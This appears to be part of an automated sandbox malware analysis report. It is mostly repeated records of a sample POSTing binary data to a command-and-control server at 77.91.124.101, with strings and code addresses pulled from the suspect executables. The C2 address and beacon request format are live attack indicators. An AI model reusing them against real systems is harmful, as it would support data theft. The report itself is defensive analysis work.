                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2532Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1396Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 1408Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continue
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2544Expect: 100-continueConnection: Keep-Alive
                                  Source: global trafficHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 2536Expect: 100-continueConnection: Keep-Alive
                                  Source: Joe Sandbox ViewASN Name: ECOTEL-ASRU ECOTEL-ASRU
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.124.101
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002B9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.124.101/imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/Pythontr
                                  Source: qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002D45000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://77.91.1H
                                  Source: BlockrefBrokerperf.exe, 00000005.00000002.2209540037.0000000003A3E000.00000004.00000800.00020000.00000000.sdmp, qBJICEqiLNwXNBLrN.exe, 0000000C.00000002.3242734675.0000000002A81000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownTCP traffic detected without corresponding DNS query: 77.91.124.101
                                  Source: unknownHTTP traffic detected: POST /imagewindows/cdnprotonpipe/9db/Providerphp/downloadsEternalDle/uploads/PythontrackDump/Image/Uploads5/temporarymulti/ToPythonpacketProcessormultiTrafficUniversal.php HTTP/1.1Content-Type: application/octet-streamUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36Host: 77.91.124.101Content-Length: 344Expect: 100-continueConnection: Keep-Alive

                                  System Summary

                                  barindex
                                  Source: 0.3.o9jDrpZrgR.exe.6e7d70c.1.raw.unpack, s67.csLong String: Length: 402992
                                  Source: 0.3.o9jDrpZrgR.exe.657270c.0.raw.unpack, s67.csLong String: Length: 402992
                                  Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_0088848E0_2_0088848E
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008940880_2_00894088
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008900B70_2_008900B7
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008840FE0_2_008840FE
                                  Source: C:\Users\user\Desktop\o9jDrpZrgR.exeCode function: 0_2_008A51C90_2_008A51C9
